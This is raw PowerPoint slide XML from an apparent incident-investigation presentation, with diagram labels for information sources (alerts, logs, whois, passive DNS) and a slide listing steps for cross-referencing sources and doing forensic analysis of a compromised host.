                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC66EAC6-AAD8-474B-AF68-3CDCA5935031}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5076055" y="4800600"/>
              <a:ext cx="751657" cy="33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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="r" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="002541"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Rambla" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Alerts</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25604" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AC7B099-372F-954D-9671-0D254643C628}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5942013" y="5743575"/>
              <a:ext cx="650875" cy="33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chemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Droid Sans Fallback" charset="0"/>
                  <a:cs typeface="Droid Sans Fallback" charset="0"/>
                </a:defRPr>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="r" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="002541"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Rambla" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Logs</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25605" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{362F8802-5817-E84F-92D0-9F566307698E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5578475" y="6154738"/>
              <a:ext cx="2193925" cy="33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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="r" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="002541"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Rambla" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Published reports</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25606" name="Rectangle 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AE6BE28-FCC4-F442-9BAF-89933105B684}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4478338" y="5434013"/>
              <a:ext cx="1535112" cy="33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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="r" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="002541"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Rambla" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Web searches</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25607" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCC69CF3-A4BC-2440-968A-E27A84E5FF83}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7713663" y="5394325"/>
              <a:ext cx="881062" cy="33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chemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Droid Sans Fallback" charset="0"/>
                  <a:cs typeface="Droid Sans Fallback" charset="0"/>
                </a:defRPr>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="r" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="002541"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Rambla" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>whois</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25608" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE0D0EFA-2EE0-1949-BC35-18ADD868E4BC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7132638" y="5668963"/>
              <a:ext cx="1614487" cy="33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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="r" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="002541"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Rambla" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Passive DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25609" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFBFF591-46FE-4F4D-9ACE-7CCFC2F755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3698" r="33154"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6316663" y="3709988"/>
              <a:ext cx="1700212" cy="1463675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
            <a:extLst>
              <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
                <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a:blipFill dpi="0" rotWithShape="0">
                    <a:blip/>
                    <a:srcRect t="13698" r="33154"/>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xnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="3" name="Straight Arrow Connector 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D4CEAEA-4F79-A74D-AE3C-FD5796BD3935}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5847519" y="4985675"/>
              <a:ext cx="286171" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00B8FF"/>
            </a:solidFill>
            <a:ln w="381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Straight Arrow Connector 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3200DDE5-9AF5-9D4E-B585-C6C1D08D09AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="6013450" y="5229200"/>
              <a:ext cx="303213" cy="360040"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00B8FF"/>
            </a:solidFill>
            <a:ln w="381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Straight Arrow Connector 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E00E9BCD-11A8-864D-A0CC-8878CFE48DCB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="6523830" y="5248276"/>
              <a:ext cx="208410" cy="588962"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00B8FF"/>
            </a:solidFill>
            <a:ln w="381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Straight Arrow Connector 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33AAECA1-539C-D345-9ADF-FCF03B4508FD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="7103204" y="5246354"/>
              <a:ext cx="27970" cy="837614"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00B8FF"/>
            </a:solidFill>
            <a:ln w="381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Straight Arrow Connector 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E705D776-ECF4-3147-999C-8B90D4A94CC7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="7502138" y="5243117"/>
              <a:ext cx="139352" cy="487758"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00B8FF"/>
            </a:solidFill>
            <a:ln w="381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 name="Straight Arrow Connector 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E07F8A77-291D-4F4B-B03D-C3E31246619A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="7831396" y="5223209"/>
              <a:ext cx="179594" cy="263787"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00B8FF"/>
            </a:solidFill>
            <a:ln w="381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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95F15FAB-C329-B149-B8DE-666D184F6BF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Investigation Continues with Cross-Referencing Sources </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27650" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D9A2A68-4721-7747-9AA2-A18563DF4706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="8693150" cy="430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29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1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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2pPr>
            <a:lvl3pPr marL="804863" indent="-460375">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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Verify accuracy of incoming information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cross-check low-level information (memory, traffic, binaries)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Carry out forensic analysis of compromised host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>More completeness leads to asking more questions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="687388" lvl="2" indent="-342900" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What is the overall impact? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="687388" lvl="2" indent="-342900" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Are there other instances of the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>event we are researching?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="687388" lvl="2" indent="-342900" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What information </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is missing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="687388" lvl="2" indent="-342900" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What can be done to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eliminate threat, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>if possible?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64DC94E9-3747-2E4E-942F-0463F4DFAFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4478338" y="3709988"/>
            <a:ext cx="4268787" cy="2781300"/>
            <a:chOff x="4478338" y="3709988"/>
            <a:chExt cx="4268787" cy="2781300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Rectangle 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F6A537E-2144-8F41-8E4C-5E027C399D0F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5076055" y="4800600"/>
              <a:ext cx="751657" cy="33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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="r" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="002541"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Rambla" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Alerts</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DC11D93-77CB-0948-BC3A-E3F3D2630789}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5942013" y="5743575"/>
              <a:ext cx="650875" cy="33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chemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Droid Sans Fallback" charset="0"/>
